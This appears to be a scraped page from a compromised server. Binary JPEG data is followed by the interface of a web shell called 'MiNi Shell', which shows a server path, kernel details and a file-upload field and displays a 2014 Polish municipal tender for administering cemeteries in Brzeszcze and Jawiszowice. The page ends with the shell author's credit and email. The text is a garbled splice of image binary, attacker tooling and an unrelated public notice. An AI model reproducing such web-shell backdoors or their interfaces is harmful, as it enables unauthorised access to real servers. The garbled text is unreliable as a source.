JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20141124/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20141124/242907-N-2014.html

<p class="kh_header"><b>Brzeszcze: Administrowanie cmentarzami komunalnymi w Brzeszczach 
i w Jawiszowicach w latach 2015r. - 2017 r.</b><br>
<b>Numer ogłoszenia: 242907 - 2014; data zamieszczenia: 24.11.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd  Gminy Brzeszcze , ul. Kościelna 4, 32-620 Brzeszcze, woj. małopolskie, tel. 032 7728500.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.brzeszcze.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Administrowanie cmentarzami komunalnymi w Brzeszczach 
i w Jawiszowicach w latach 2015r. - 2017 r..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest administrowanie cmentarzami komunalnymi stanowiącymi własność Gminy Brzeszcze, położonymi:
 w Brzeszczach w rejonie ulic Ofiar Oświęcimia, Dąbrowskiego i Sobieskiego o łącznej
    powierzchni 27 101 m2,
 w Jawiszowicach w rejonie ulicy Olszyny o łącznej powierzchni 35 975 m2 .  

I.Zakres obowiązków dotyczących administrowania cmentarzami:
1)prowadzenie racjonalnej gospodarki miejscami grzebalnymi poprzez wyznaczanie miejsc pod groby na cmentarzu komunalnym położonym w Jawiszowicach, zgodnie z projektem budowlanym : poszerzenie cmentarza i budowa Domu Pogrzebowego w Jawiszowicach wykonanym przez Biuro Projektów PROZACH Sp. z o.o.  z siedzibą w Oświęcimiu 
ul. Chemików 1, zatwierdzonym decyzją Starostwa Powiatowego w Oświęcimiu 
SAB.7351-290/01 z dnia 19.12.2001r. a przede wszystkim zgodnie z opracowanym na dzień 17 stycznia 2007r. przez geodetę uprawnionego Barbarę Chowaniec Planem usytuowania grobów w Jawiszowicach oraz poprzez wyznaczanie miejsc pod groby na cmentarzu komunalnym położonym w Brzeszczach, zgodnie z projektem budowlanym : poszerzenia cmentarza komunalnego w Brzeszczach wykonanym przez Pracownie Projektową  Architektoniczno - Budowlaną Sp. z o.o. z siedzibą w Krakowie ul. Wiśniowa 16/53, zatwierdzonym decyzją Starostwa Powiatu Oświęcimskiego znak:SAB.7353-47/02 
z dnia 06.08.2002r., a przede wszystkim zgodnie z opracowanym na dzień 13 kwietnia 2007r. przez geodetę uprawnionego Barbarę Chowaniec Planem usytuowania grobów        
w Brzeszczach  oraz z opracowanym na dzień 18 sierpnia 2014 r. przez geodetę uprawnionego Barbarę Chowaniec Szkicem rozmieszczenia grobów w sektorze GR10 Cmentarza Komunalnego w Brzeszczach.
2)prowadzenie dokumentacji cmentarnej w formie pisemnej i elektronicznej w systemie informatycznym Grobonet 2.2, który stanowi własność Gminy Brzeszcze, 
w szczególności
a) ksiąg osób pochowanych na cmentarzach prowadzonych według numeracji narastającej lub w układzie rocznikowym (księgi istniejące),
b) ksiąg grobów,
c) ksiąg cmentarnych zawierających alfabetyczny spis osób pochowanych na cmentarzach,
d) przechowanie ksiąg cmentarnych w pomieszczeniach zapewniających należyte ich zabezpieczenie przed uszkodzeniem, zniszczeniem, kradzieżą oraz w sposób uniemożliwiający przetwarzanie danych w księgach cmentarnych przez osoby nieupoważnione,
e) bieżące aktualizowanie bazy danych systemu informatycznego Grobonet 2.2
3)wskazywanie miejsc wykopania grobów, nadzór nad wykonywanymi pracami oraz odbiór techniczny grobów po ich wykonaniu w zakresie utrwalania grobów ziemnych, budowy grobów murowanych i budowy grobowców,
4)ustalanie terminów i warunków pogrzebów wraz z obsługą interesantów,
5)pobieranie opłat za usługi cmentarne na podstawie stosownej uchwały  Rady Miejskiej
w Brzeszczach i przekazywanie ich do Urzędu Gminy w Brzeszczach w terminie do połowy oraz do 25 dnia każdego następnego miesiąca (dwa razy w miesiącu) za poprzedni okres rozliczeniowy w wysokościach zainkasowanych kwot w rozbiciu  na poszczególne cmentarze oraz prowadzenie niezbędnej dokumentacji finansowej,
6)udostępnianie wszelkich dokumentów i informacji związanych z administrowaniem
 cmentarzami na żądanie Zamawiającego,
7)przestrzeganie i egzekwowanie zasad korzystania z Cmentarzy określonych uchwałami Rady Miejskiej w Brzeszczach oraz zarządzeniami Burmistrza Brzeszcz,
8)otwieranie i zamykanie bram cmentarzy, obsługa i udostępnianie Kaplicy i Domu Pogrzebowego oraz chłodni,
9)nadzorowanie przeprowadzanych ekshumacji,
II.Zakres obowiązków dotyczących utrzymania cmentarzy:
1)utrzymanie we właściwym stanie sanitarno - porządkowym oraz technicznym budynków, obiektów i budowli usytuowanych na cmentarzach komunalnych poprzez:
             wykonywanie bieżących konserwacji i drobnych napraw a w szczególności
                urządzeń w budynku Kaplicy i w Domu Pogrzebowym, w budynku WC i TOI TOI,
                istniejących  ogrodzeń cmentarzy, oświetlenia i sieci wodociągowej,
zawarcie we własnym zakresie umów na dostawę wody i ponoszenia kosztów z tego tytułu we własnym zakresie,
zużycie wody na cmentarzu komunalnym w Brzeszczach w 2013 r. wyniosło 233 m3 , 
a za okres od 01.01.2014r. do 31.10.2014 r. wyniosło 192 m3 ,
 zużycie wody na cmentarzu komunalnym w Jawiszowicach w 2013 r. wyniosło 269,5 m3  
w tym 120 m3 awaria przyłącza wodnego) a za okres od 01.01.2014r. do 31.10.2014r. Wyniosło 107,50 m3  
zawarcie we własnym zakresie umowy na dostawę energii elektrycznej i ponoszenia kosztów z tego tytułu we własnym zakresie:
 zużycie energii elektrycznej na cmentarzu komunalnym w Brzeszczach w 2013 r. wyniosło 7713 kWh a za okres od 01.01.2014 r. do 31.10.2014 r. wyniosło 3703 kWh,
zużycie energii elektrycznej na cmentarzu komunalnym w Jawiszowicach  w 2013r. Wyniosło 13358 kWh a za okres 01.01.2014r. do 31.10.2014 r. wyniosło 5210 kWh,
zawarcie we własnym zakresie umowy na odbiór nieczystości stałych i ponoszenia kosztów z tego tytułu we własnym zakresie
ilość wytwarzanych nieczystości stałych na cmentarzu komunalnym w Brzeszczach  
w 2013 r. wyniosła  959 m3 a za okres od 1.01.2014 r. do 31.10.2014 r. wyniosła 214,4m3 , dodatkowo w okresie od 1.02.2014 r. - 31.10.2014 r. opróżniano pojemnik EKO (KP-7 - 4 razy),
 ilość wywiezionej skoszonej trawy na cmentarzu komunalnym w Brzeszczach w okresie od kwietnia do października 2014 r.  wyniosła ok  20 m3,
ilość wytwarzanych nieczystości stałych na cmentarzu komunalnym w Jawiszowicach            w 2013 r. wyniosła 610 m3  a za okres od 01.01.2014 r. do 31.10.2014 r. wyniosła 159,5 m3, dodatkowo w okresie od 1.02.2014 r. - 31.10.2014 r. opróżniano pojemnik EKO (KP-7 - 3 razy), ilość wywiezionej skoszonej trawy na cmentarzu komunalnym w Jawiszowicach w okresie od kwietnia do października 2014 r.  wyniosła ok  40 m3,
oraz zapewnienie odpowiedniej ilości pojemników na odpady stałe o pojemności od 1100 litrów do 7000 litrów oraz  usuwania odpadów zgodnie z wymogami określonymi w stosownych Uchwałach Rady Miejskiej w Brzeszczach i utrzymanie w należytym stanie sanitarnym, porządkowym i technicznym pojemników na odpady stałe. 
Utrzymanie zieleni poprzez:
 usuwanie na bieżąco posuszu i wiatrołomów,
 dosiewanie trawy
 koszenie trawy minimum 3 razy w roku na terenach cmentarzy komunalnych w Brzeszczach i w Jawiszowicach, w tym również: 
 trawników położonych w Brzeszczach w rejonie parkingu przy ul. Sobieskiego i trawników pomiędzy ul. Dąbrowskiego a ogrodzeniem cmentarza, 
 trawników położonych w Jawiszowicach poza terenem cmentarza, do jednego metra za ogrodzeniem,
Koszenie trawy należy przeprowadzić w taki sposób, aby nie uszkodzić oraz nie zabrudzić grobowców, pomników.
(powierzchnia do koszenia na terenie cmentarza komunalnego w Brzeszczach wynosi około 3000 m2 )
(powierzchnia do koszenia na terenie cmentarza komunalnego w Jawiszowicach wynosi około 10000 m2 )
całoroczne utrzymanie porządku i czystości alejek, parkingów, chodników położonych na
 terenie i wokół cmentarzy poprzez :
 odchwaszczanie ręczne lub środkami chwastobójczymi alejek na cmentarzach,
 bieżące zamiatanie alejek, parkingów i terenów wokół cmentarzy, wywożenie odpadów,
    liści itp,
 bieżące grabienie liści na terenie cmentarzy i wokół nich a w szczególności w okresie
    święta  Wszystkich Świętych,
 w okresie zimowym odśnieżanie parkingów , alejek i przeciwdziałanie gołoledzi łącznie 
   z posypywaniem i oczyszczeniem ze śniegu i lodu dojść do grobów i alejek,
   a w szczególności miejsc wokół Kaplicy i Domu Pogrzebowego,
powierzchnia alejek do utrzymania na terenie cmentarza komunalnego w Brzeszczach
    wynosi około 2 850,25 m2 
powierzchnia parkingu przy cmentarzu komunalnym w Brzeszczach około 1560 m2 
powierzchnia alejek do utrzymania na terenie cmentarza komunalnego w Jawiszowicach     wynosi około 1 708,20 m2 

Utrzymanie grobów wojennych i miejsc pamięci narodowej znajdujących się na terenie
cmentarza, (wykaz stanowi Załącznik Nr 1 do niniejszej specyfikacji) poprzez między innymi:
 w okresie świąt państwowych i w okresie święta Wszystkich Świętych dekorowanie flagami i wieńcami zakupionymi ze środków własnych Wykonawcy,
 obsadzanie kwiatami i bylinami,
 uzupełnianie ziemi na grobach,
całoroczne utrzymanie porządku i czystości poprzez mycie pomników i obmurówek grobów, zamiatanie, grabienie liści, a w okresie zimowym poprzez odśnieżanie
Dwukrotne w ciągu roku w okresie wiosennym i jesiennym sprzątanie grobów  zasłużonych
wymienionych w załączniku Nr 2 do niniejszej specyfikacji oraz grobów opuszczonych 
i zaniedbanych znajdujących się na terenie cmentarzy,
Zapewnienie możliwości korzystania z wody z istniejących ujęć na terenie cmentarzy,
Sprawowanie dozoru terenu i obiektów cmentarzy w godzinach jego otwarcia i poza nimi,

III.Przy wykonywaniu umowy Wykonawca zobowiązany jest do  przestrzegania następujących
aktów prawnych:
Przepisów określonych w ustawie z dnia 31 stycznia 1959r. o cmentarzach 
i chowaniu zmarłych (jednolity tekst Dz.U. z 2011r. Nr 118 poz. 687 z późn. zmianami),
Przepisów Rozporządzenia Ministra Spraw Wewnętrznych i Administracji z dnia                    1 sierpnia 2001r. w sprawie sposobu prowadzenia ewidencji grobów (Dz.U. z 2001r. Nr 90 poz. 1013 z późniejszymi zmianami) 
Przepisów Rozporządzenia Ministra Zdrowia z dnia 6 grudnia 2001r. w sprawie wykazu chorób zakaźnych, w przypadku  których stwierdzenie zgonu wymaga szczególnego postępowania ze zwłokami osób zmarłych na te choroby (Dz.U.z 2001r. Nr 152 poz.1742),
Przepisów Rozporządzenia Ministra Zdrowia z dnia 7 grudnia 2001r. 
w sprawie postępowania ze  zwłokami i szczątkami ludzkimi (Dz.U. z 2001r. Nr 153 
poz. 1783),
Przepisów Ustawy z dnia 21 sierpnia 1997r. o gospodarce nieruchomościami (jednolity tekst Dz.U. Z 2014 r.  poz. 518 z późniejszymi zmianami),
Stosowne uchwały Rady Miejskiej w Brzeszczach między innymi w sprawie opłat za usługi cmentarne na cmentarzach komunalnych położonych w Brzeszczach i w Jawiszowicach oraz Zarządzeniami Burmistrza Brzeszcz..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 98.37.11.11-5, 70.33.00.00-3, 70.33.22.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2017.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający  wymaga wniesienia wadium przed upływem terminu składania ofert 
w wysokości: 7.200,00 PLN</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający  żąda przedłożenia w ofercie wykazu wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych głównych usług w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy- w tym okresie wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów na rzecz których usługi zostały wykonane oraz z załączeniem dowodów czy zostały wykonane lub są wykonywane należycie.
Warunkiem spełnienia warunku jest przynajmniej wykonywanie przez okres pełnego 1 roku  usługi określonej niniejszym zamówieniem lub zarządzanie nieruchomościami lokalowymi o wartości brutto minimum 20 000 zł.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający żąda przedłożenia w ofercie wykazu narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami,</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający żąda przedłożenia w ofercie opłaconej polisy OC Wykonawcy, a w przypadku jej braku innego dokumentu potwierdzającego, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia 
Zamawiający wymaga, aby kwota ubezpieczenia nie była niższa, niż 50.000 PLN</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 98</li>
<li>2 - Czas pracy biura obsługi klienta - 2</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Dopuszcza się możliwość zmiany wynagrodzenia umownego w przypadku zmiany obowiązującej stawki podatku od towarów i usług.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.brzeszcze.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy w Brzeszczach, ul. Kościelna 4, pok. nr 218.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 04.12.2014 godzina 10:00, miejsce: Sekretariat lub Informatorium Urzędu Gminy w Brzeszczach ul. Kościelna 4.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com